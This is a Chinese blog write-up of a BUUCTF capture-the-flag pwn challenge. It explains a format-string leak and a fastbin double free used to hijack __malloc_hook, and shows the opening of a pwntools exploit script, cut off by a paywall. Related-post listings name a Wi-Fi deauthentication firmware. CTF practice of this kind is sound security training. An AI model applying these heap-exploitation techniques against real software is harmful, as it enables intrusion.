BUUCTF-PWN刷题记录-7

最新推荐文章于 2022-12-16 11:16:57 发布
最新推荐文章于 2022-12-16 11:16:57 发布
阅读量878 收藏
点赞数
分类专栏: BUU-PWN 文章标签: 字符串 指针 链表 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44145820/article/details/105511292
版权

目录

gyctf_2020_some_thing_interesting(格式化字符串漏洞, double free)

在这里插入图片描述

程序分析

开始前要先输入验证码,可输入长度为19,然而比较长度仅为14
在这里插入图片描述
这个函数中有格式化字符串漏洞,字符串为之前输入的验证码
在这里插入图片描述
删除之后指针没有置空,double free
在这里插入图片描述

漏洞利用
  1. 利用格式化字符串漏洞泄露libc地址
  2. 进行两次add,对于每次add,其中一个大小为0x68,另一个随意
  3. delete(1), delete(2), delete(1),该题目编号从1开始,不直接double free因为会崩
    在这里插入图片描述
  4. 把chunk大小为0x70块的fd改为__malloc_hook-0x23,劫持即可
Exp
from pwn import *

r = remote("node3.buuoj.cn", 27484)
#r = process("./gyctf_2020_some_thing_interesting")

context.log_level = 'debug'

elf = ELF("./gyctf_2020_some_thing_interesting")
libc = ELF('./libc/libc-2.23.so')
one_gadget_16 = [0x45216,0x4526a,0xf02a4,0xf1147]

def add(size1, content1, size2, content2):
	r.recvuntil("#######################\n")
	r.sendline('1')
	r.recvuntil("> O's length : ")
	r.sendline(str(size1))
	r.recvuntil("> O : ")
	r.send(content1)
	r.recvuntil("> RE's length : ")
	r.sendline(str(size2))
	r.recvuntil("> RE : ")
	r.send(content2)

def delete(index):
	r.recvuntil("#######################\n")
	r.sendline('3')
	r.recvuntil("> Oreo ID : ")
	r.sendline(str(index))

def show(index):
	r.recvuntil("#######################\n")
	r.sendline('4')
	r.recvuntil("> Oreo ID : ")
	r.sendline(str(index))

def edit(index, content1, content2):
	r.recvuntil("#######################\n")
	r.sendline('2')
	r.recvuntil("&
最低0.47元/天 解锁文章
L.o.W
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-PWN刷题记录-22
weixin_44145820的博客
05-18 656
目录ciscn_2019_n_2(double free) ciscn_2019_n_2(double free) delete的时候有一个double free漏洞 利用思路: 先用一个double free把0x602060(chunklist)申请出来,这样我们就能先修改里面的指针了,先利用GOT表泄露libc,然后写入__free_hook的地址并使用编辑写入system地址就行 Exp: from pwn import * menu = "Your choice: " def add(con
学习笔记:buuctf pwn
RookieMOR的博客
06-28 285
如有不对,请指正
[BUUCTF]PWN7——[OGeek2019]babyrop
mcmuyanga的博客
08-25 1209
[BUUCTF]PWN7——[OGeek2019]babyrop 题目网址:https://buuoj.cn/challenges#[OGeek2019]babyrop 步骤: 例行检查,32位,开启了RELRO(对got表不可以写)和NX(堆栈不可执行) nc的时候没有什么回显,用32位ida打开附件,shift+f12查看程序里的字符串,没有发现system和/bin/sh 从main函数开始看程序 用户输入一个字符串给buf,然后跟随机数比较大小,strncmp里的比较长度的参数v1是我们输入
buuctf——pwn刷题之旅(持续更新)
qq_42988973的博客
12-16 390
buuctf-pwn 的一些wp
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
BUUCTF-PWN刷题记录-19
weixin_44145820的博客
05-09 456
目录wustctf2020_name_your_catwustctf2020_name_your_dog wustctf2020_name_your_cat 在NameWhich函数中没有越界检查 我们调试看一下 0xffd31214就是char v3[40]的地址 而在0xffd3124c处就存放着函数返回地址 0xffd3124c-0xffd31214=0x38 0x38/8=7 所以我们name 7 就能修改这个返回地址了 Exp: from pwn import * r = remote
BUUCTF-PWN刷题记录-11
weixin_44145820的博客
04-22 828
目录wustctf2020_name_your_cat wustctf2020_name_your_cat
BUUCTF-PWN刷题记录-14
weixin_44145820的博客
04-29 596
目录sctf_2019_easy_heap(块重叠,double free) sctf_2019_easy_heap(块重叠,double free) 这题原题目好像是在Ubuntu16下的,但是BUU上面是Ubuntu18,所以应该更简单一点 总的来说,这题应该是ciscn_2019_final_3的加强版吧,当然也有更简单的地方 首先,给了我们一块rwx的空间 add函数会给你conten...
BUUCTF-PWN刷题记录-16
weixin_44145820的博客
05-05 708
目录ciscn_2019_es_5(realloc double free)npuctf_2020_easyheap(off-by-one) ciscn_2019_es_5(realloc double free) 申请没有大小限制,数目上限为10 edit会调用realloc重新申请(其实不会的,因为大小不变) 如果edit就不能show了 看了一下这题没有什么明显漏洞,但是考虑到re...
BUUCTF-PWN刷题记录-15
weixin_44145820的博客
04-29 665
目录0ctf_2016_warmup(ROP,利用alarm修改eax)SWPUCTF_2019_login(格式化字符串漏洞,字符串位于bss) 0ctf_2016_warmup(ROP,利用alarm修改eax) 不能执行shellcode 有一个缓冲区溢出 由于NX保护,我们只能考虑ROP 这里有一个小技巧,就是alarm函数 程序开始调用了alarm 如果我们之后再次调用alarm,...
BUUCTF-PWN刷题记录-4
weixin_44145820的博客
04-10 1010
目录hitcontraining_secretgarden hitcontraining_secretgarden 这题需要使用double free size字段的高四位可以不为0
BUUCTF-PWN刷题记录-8
weixin_44145820的博客
04-16 887
目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic
BUUCTF-PWN刷题记录-6
weixin_44145820的博客
04-14 826
目录picoctf_2018_are you rootciscn_2019_final_2 picoctf_2018_are you root 例行安全检查 菜单如下: 我们需要auth_level等于5才能get flag user结构体如下 struct USER{ char *name; long long auth_level; } 漏洞原理分析: 在login中分配了两次内存...
BUUCTF-PWN刷题记录-9
weixin_44145820的博客
04-17 1464
目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic
mqtt-pwn安装
最新发布
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值